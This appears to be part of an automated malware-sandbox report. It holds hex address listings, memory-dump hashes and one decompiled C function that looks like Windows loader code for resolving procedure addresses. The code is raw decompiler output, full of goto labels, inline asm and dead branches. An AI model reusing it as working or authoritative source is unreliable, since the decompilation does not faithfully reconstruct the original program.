                                                0x01655967
                                                0x0165596b
                                                0x0165596d
                                                0x00000000
                                                0x00000000
                                                0x0165596f
                                                0x01655971
                                                0x01655971
                                                0x01655974
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01655974
                                                0x00000000
                                                0x01655967
                                                0x0165595b
                                                0x01655942
                                                0x01655863
                                                0x01612143
                                                0x01612143
                                                0x01612149
                                                0x0161214f
                                                0x016122f1
                                                0x016122f6
                                                0x00000000
                                                0x01612173
                                                0x01612173
                                                0x0161217d
                                                0x01612181
                                                0x01612186
                                                0x016559ae
                                                0x016559b2
                                                0x016559b5
                                                0x016559b7
                                                0x016559ba
                                                0x016559cd
                                                0x016559d1
                                                0x016559d5
                                                0x016559d9
                                                0x016559db
                                                0x00000000
                                                0x00000000
                                                0x016559dd
                                                0x016559dd
                                                0x016559e1
                                                0x016559e4
                                                0x016559e7
                                                0x016559ee
                                                0x016559ee
                                                0x016559f3
                                                0x016559f3
                                                0x00000000
                                                0x01612186
                                                0x0161214f
                                                0x01612106
                                                0x01612266
                                                0x016120d8
                                                0x016120da
                                                0x016120e0
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fbea8d0776c03daee08b98e2856c1d0f6369cef5f68104fe50cd92fdd83c63b
                                                • Instruction ID: add6eb203995c000677b96c4dfa6c0dbed2febd50eb0638b1a59f7806f0282d9
                                                • Opcode Fuzzy Hash: 5fbea8d0776c03daee08b98e2856c1d0f6369cef5f68104fe50cd92fdd83c63b
                                                • Instruction Fuzzy Hash: F3F10431A083419FE726CF2DCC5476B7BE6AF85324F28851DEA968B385D734D841CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015FD5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 87%
                                                			E015FD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x16dd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E015F6600(0x16d52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x16d7b9c; // 0x0
							_t281 = L01604620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0162F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x16d7b90; // 0x775e0000
								if(_t384 == 0) {
									_t353 =  *0x16d7b8c; // 0x1182a88
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01602280(_t200, 0x16d84d8);
									_t277 =  *0x16d85f4; // 0x1182f78
									_t351 =  *0x16d85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1182f10
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E015FFFB0(_t287, _t353, 0x16d84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0163CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E015F6600(0x16d52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E015F7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x16db239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0166E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x16d8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x16db1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x16db218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01602280(_t250, 0x16d84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01623898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E015FFFB0(_t293, _t353, 0x16d84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E016237F5(_t353, 0);
																}
																E01620413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01619B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E016102D6(_t174);
																}
																L016077F0( *0x16d7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0161C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L015FEC7F(_t353);
										L016119B8(_t287, 0, _t353, 0);
										_t200 = E015EF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x16db2f8 |  *0x16db2fc) == 0 || ( *0x16db2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0162B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x16db2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01696B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01696AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E015FE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L015FEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01629730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E015FE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L015F8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01623C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                0x015fd5f2
                                                0x015fd5f5
                                                0x015fd5f5
                                                0x015fd5fd
                                                0x015fd600
                                                0x015fd60a
                                                0x015fd60d
                                                0x015fd617
                                                0x015fd61d
                                                0x015fd627
                                                0x015fd62e
                                                0x015fd911
                                                0x015fd913
                                                0x00000000
                                                0x015fd919
                                                0x015fd919
                                                0x015fd919
                                                0x015fd634
                                                0x015fd634
                                                0x015fd634
                                                0x015fd634
                                                0x015fd640
                                                0x015fd8bf
                                                0x00000000
                                                0x015fd646
                                                0x015fd646
                                                0x015fd64d
                                                0x015fd652
                                                0x0164b2fc
                                                0x0164b2fc
                                                0x0164b302
                                                0x0164b33b
                                                0x0164b341
                                                0x00000000
                                                0x0164b304
                                                0x0164b304
                                                0x0164b319
                                                0x0164b31e
                                                0x0164b324
                                                0x0164b326
                                                0x0164b332
                                                0x0164b347
                                                0x0164b34c
                                                0x0164b351
                                                0x0164b35a
                                                0x00000000
                                                0x0164b328
                                                0x0164b328
                                                0x00000000
                                                0x0164b328
                                                0x0164b326
                                                0x015fd658
                                                0x015fd658
                                                0x015fd65b
                                                0x015fd665
                                                0x00000000
                                                0x015fd66b
                                                0x015fd66b
                                                0x015fd66b
                                                0x015fd66b
                                                0x015fd66d
                                                0x015fd672
                                                0x015fd67a
                                                0x00000000
                                                0x00000000
                                                0x015fd680
                                                0x015fd686
                                                0x015fd8ce
                                                0x015fd8d4
                                                0x015fd8dd
                                                0x015fd8e0
                                                0x015fd68c
                                                0x015fd691
                                                0x015fd69d
                                                0x015fd6a2
                                                0x015fd6a7
                                                0x015fd6b0
                                                0x015fd6b5
                                                0x015fd6e0
                                                0x015fd6b7
                                                0x015fd6b7
                                                0x015fd6b9
                                                0x015fd6b9
                                                0x015fd6bb
                                                0x015fd6bd
                                                0x015fd6ce
                                                0x015fd6d0
                                                0x015fd6d2
                                                0x0164b363
                                                0x0164b365
                                                0x00000000
                                                0x0164b36b
                                                0x00000000
                                                0x0164b36b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015fd6bf
                                                0x015fd6bf
                                                0x015fd6e5
                                                0x015fd6e7
                                                0x015fd6e9
                                                0x015fd6ec
                                                0x015fd6ec
                                                0x015fd6ef
                                                0x015fd6f5
                                                0x015fd6f9
                                                0x015fd6fb
                                                0x015fd6fd
                                                0x015fd701
                                                0x015fd703
                                                0x015fd70a
                                                0x015fd70a
                                                0x015fd701
                                                0x015fd710
                                                0x015fd710
                                                0x015fd6c1
                                                0x015fd6c1
                                                0x015fd6c6
                                                0x0164b36d
                                                0x0164b36f
                                                0x00000000
                                                0x0164b375
                                                0x0164b375
                                                0x0164b375
                                                0x00000000
                                                0x0164b375
                                                0x00000000
                                                0x015fd6cc
                                                0x015fd6d8
                                                0x015fd6d8
                                                0x015fd6d8
                                                0x00000000
                                                0x015fd6c6
                                                0x015fd6bf
                                                0x00000000
                                                0x015fd6da
                                                0x015fd6da
                                                0x015fd716
                                                0x015fd71b
                                                0x015fd720
                                                0x015fd726
                                                0x015fd726
                                                0x015fd72d
                                                0x00000000
                                                0x015fd733
                                                0x015fd739
                                                0x015fd742
                                                0x015fd750
                                                0x015fd758
                                                0x015fd764
                                                0x015fd776
                                                0x015fd77a
                                                0x015fd783
                                                0x015fd928
                                                0x015fd92c
                                                0x015fd93d
                                                0x015fd944
                                                0x015fd94f
                                                0x015fd954
                                                0x015fd956
                                                0x015fd95f
                                                0x015fd961
                                                0x015fd973
                                                0x015fd973
                                                0x015fd956
                                                0x015fd944
                                                0x015fd92c
                                                0x015fd78b
                                                0x0164b394
                                                0x015fd791
                                                0x015fd798
                                                0x0164b3a3
                                                0x0164b3bb
                                                0x0164b3bb
                                                0x015fd7a5
                                                0x015fd866
                                                0x015fd870
                                                0x015fd892
                                                0x015fd898
                                                0x015fd89e
                                                0x015fd8a0
                                                0x015fd8a6
                                                0x015fd8ac
                                                0x015fd8ae
                                                0x015fd8b4
                                                0x015fd8b4
                                                0x015fd8ae
                                                0x015fd7a5
                                                0x015fd78b
                                                0x015fd7b1
                                                0x0164b3c5
                                                0x0164b3c5
                                                0x015fd7c3
                                                0x015fd7ca
                                                0x015fd7e5
                                                0x015fd7eb
                                                0x015fd8eb
                                                0x015fd8ed
                                                0x00000000
                                                0x015fd8f3
                                                0x015fd8f3
                                                0x015fd8f3
                                                0x00000000
                                                0x015fd8ed
                                                0x015fd7cc
                                                0x015fd7cc
                                                0x015fd7d2
                                                0x00000000
                                                0x015fd7d4
                                                0x015fd7d4
                                                0x015fd7d7
                                                0x015fd7df
                                                0x0164b3d4
                                                0x0164b3d9
                                                0x0164b3dc
                                                0x0164b3dc
                                                0x0164b3df
                                                0x0164b3e2
                                                0x0164b468
                                                0x0164b46d
                                                0x0164b46f
                                                0x0164b46f
                                                0x0164b475
                                                0x015fd8f8
                                                0x015fd8f9
                                                0x015fd8fd
                                                0x0164b3e8
                                                0x0164b3e8
                                                0x0164b3eb
                                                0x0164b3ed
                                                0x00000000
                                                0x0164b3ef
                                                0x0164b3ef
                                                0x0164b3f1
                                                0x0164b3f4
                                                0x0164b3fe
                                                0x0164b404
                                                0x0164b409
                                                0x0164b40e
                                                0x0164b410
                                                0x0164b410
                                                0x0164b414
                                                0x0164b414
                                                0x0164b41b
                                                0x0164b420
                                                0x0164b423
                                                0x0164b425
                                                0x0164b427
                                                0x0164b42a
                                                0x0164b42d
                                                0x0164b42d
                                                0x0164b42a
                                                0x0164b432
                                                0x0164b436
                                                0x0164b438
                                                0x0164b43b
                                                0x0164b43b
                                                0x0164b449
                                                0x0164b44e
                                                0x0164b454
                                                0x0164b458
                                                0x0164b458
                                                0x0164b45d
                                                0x00000000
                                                0x0164b45d
                                                0x0164b3ed
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x015fd7df
                                                0x015fd7d2
                                                0x015fd7ca
                                                0x0164b37c
                                                0x0164b37e
                                                0x0164b385
                                                0x0164b38a
                                                0x00000000
                                                0x0164b38a
                                                0x015fd742
                                                0x015fd7f1
                                                0x015fd7f8
                                                0x0164b49b
                                                0x0164b49b
                                                0x015fd800
                                                0x015fd837
                                                0x015fd843
                                                0x015fd845
                                                0x015fd847
                                                0x015fd84a
                                                0x015fd84b
                                                0x015fd84e
                                                0x015fd857
                                                0x015fd818
                                                0x015fd824
                                                0x015fd831
                                                0x0164b4a5
                                                0x0164b4ab
                                                0x0164b4b3
                                                0x0164b4b8
                                                0x0164b4bb
                                                0x00000000
                                                0x0164b4c1
                                                0x0164b4c1
                                                0x0164b4c8
                                                0x00000000
                                                0x0164b4ce
                                                0x0164b4d4
                                                0x0164b4e1
                                                0x0164b4e3
                                                0x0164b4e5
                                                0x00000000
                                                0x0164b4eb
                                                0x0164b4f0
                                                0x0164b4f2
                                                0x015fdac9
                                                0x015fdacc
                                                0x015fdacf
                                                0x015fdad1
                                                0x015fdd78
                                                0x015fdd78
                                                0x015fdcf2
                                                0x00000000
                                                0x015fdad7
                                                0x015fdad9
                                                0x015fdadb
                                                0x00000000
                                                0x00000000
                                                0x015fdae1
                                                0x015fdae1
                                                0x015fdae4
                                                0x015fdae6
                                                0x0164b4f9
                                                0x0164b4f9
                                                0x0164b500
                                                0x015fdaec
                                                0x015fdaec
                                                0x015fdaf5
                                                0x015fdaf8
                                                0x015fdafb
                                                0x015fdb03
                                                0x015fdb11
                                                0x015fdb16
                                                0x015fdb19
                                                0x015fdb1b
                                                0x0164b52c
                                                0x0164b531
                                                0x0164b534
                                                0x015fdb21
                                                0x015fdb21
                                                0x015fdb24
                                                0x015fdcd9
                                                0x015fdce2
                                                0x015fdce5
                                                0x015fdd6a
                                                0x015fdd6d
                                                0x00000000
                                                0x015fdd73
                                                0x0164b51a
                                                0x0164b51c
                                                0x0164b51f
                                                0x0164b524
                                                0x00000000
                                                0x0164b524
                                                0x015fdce7
                                                0x015fdce7
                                                0x015fdce7
                                                0x00000000
                                                0x015fdce7
                                                0x00000000
                                                0x015fdb2a
                                                0x015fdb2c
                                                0x015fdb31
                                                0x015fdb33
                                                0x015fdb36
                                                0x015fdb39
                                                0x015fdb3b
                                                0x015fdb66
                                                0x015fdb66
                                                0x015fdb3d
                                                0x015fdb3d
                                                0x015fdb3e
                                                0x015fdb46
                                                0x015fdb47
                                                0x015fdb49
                                                0x015fdb4c
                                                0x015fdb53
                                                0x015fdb55
                                                0x015fdb58
                                                0x015fdb5a
                                                0x0164b50a
                                                0x0164b50f
                                                0x0164b512
                                                0x015fdb60
                                                0x015fdb60
                                                0x015fdb63
                                                0x015fdb63
                                                0x00000000
                                                0x015fdb63
                                                0x015fdb5a
                                                0x015fdb3b
                                                0x015fdb24
                                                0x015fdb69
                                                0x015fdb69
                                                0x015fdb6c
                                                0x015fdb6f
                                                0x015fdb74
                                                0x0164b557
                                                0x0164b557
                                                0x0164b55e
                                                0x015fdb7a
                                                0x015fdb7c
                                                0x015fdb7f
                                                0x015fdb82
                                                0x015fdb85
                                                0x00000000
                                                0x015fdb8b
                                                0x015fdb8b
                                                0x015fdb8d
                                                0x015fdb9b
                                                0x015fdb9b
                                                0x015fdb9d
                                                0x015fdba0
                                                0x015fdba2
                                                0x015fdba4
                                                0x015fdba7
                                                0x015fdba9
                                                0x015fdbae
                                                0x015fdbae
                                                0x015fdbb1
                                                0x015fdbb4
                                                0x015fdbb4
                                                0x015fdbb7
                                                0x015fdbba
                                                0x015fdcd2
                                                0x015fdcd4
                                                0x00000000
                                                0x015fdbc0
                                                0x015fdbc0
                                                0x015fdbd2
                                                0x015fdbd7
                                                0x015fdbda
                                                0x015fdbdd
                                                0x015fdbdf
                                                0x00000000
                                                0x015fdbe5
                                                0x015fdbe5
                                                0x015fdbee
                                                0x015fdbf1
                                                0x0164b541
                                                0x0164b544
                                                0x00000000
                                                0x0164b546
                                                0x0164b546
                                                0x00000000
                                                0x0164b546
                                                0x015fdbf7
                                                0x015fdbf7
                                                0x015fdbfd
                                                0x015fdbfd
                                                0x015fdbff
                                                0x015fdc0b
                                                0x015fdc15
                                                0x015fdc1b
                                                0x015fdc1d
                                                0x015fdc21
                                                0x015fdc21
                                                0x015fdc23
                                                0x015fdc23
                                                0x015fdc26
                                                0x015fdc29
                                                0x015fdc2b
                                                0x00000000
                                                0x00000000
                                                0x015fdc31
                                                0x015fdc34
                                                0x015fdc36
                                                0x015fdcbf
                                                0x015fdcbf
                                                0x015fdcc2
                                                0x00000000
                                                0x015fdc3c
                                                0x015fdc41
                                                0x015fdc43
                                                0x00000000
                                                0x015fdc45
                                                0x015fdc45
                                                0x015fdc47
                                                0x00000000
                                                0x015fdc4d
                                                0x015fdc4d
                                                0x015fdc50
                                                0x015fdc52
                                                0x015fdc55
                                                0x015fdcfa
                                                0x015fdcfe
                                                0x015fdd08
                                                0x015fdd0a
                                                0x015fdd0c
                                                0x00000000
                                                0x015fdd12
                                                0x015fdd15
                                                0x015fdd2d
                                                0x015fdd2f
                                                0x015fdd32
                                                0x015fdd35
                                                0x00000000
                                                0x015fdd35
                                                0x015fdc5b
                                                0x015fdc5b
                                                0x015fdc5e
                                                0x015fdc61
                                                0x015fdc64
                                                0x015fdc67
                                                0x015fdc67
                                                0x015fdc6a
                                                0x015fdc6c
                                                0x015fdc8e
                                                0x015fdc8e
                                                0x015fdc91
                                                0x015fdc93
                                                0x015fdcce
                                                0x015fdcce
                                                0x015fdc95
                                                0x015fdc9c
                                                0x015fdc6e
                                                0x015fdc72
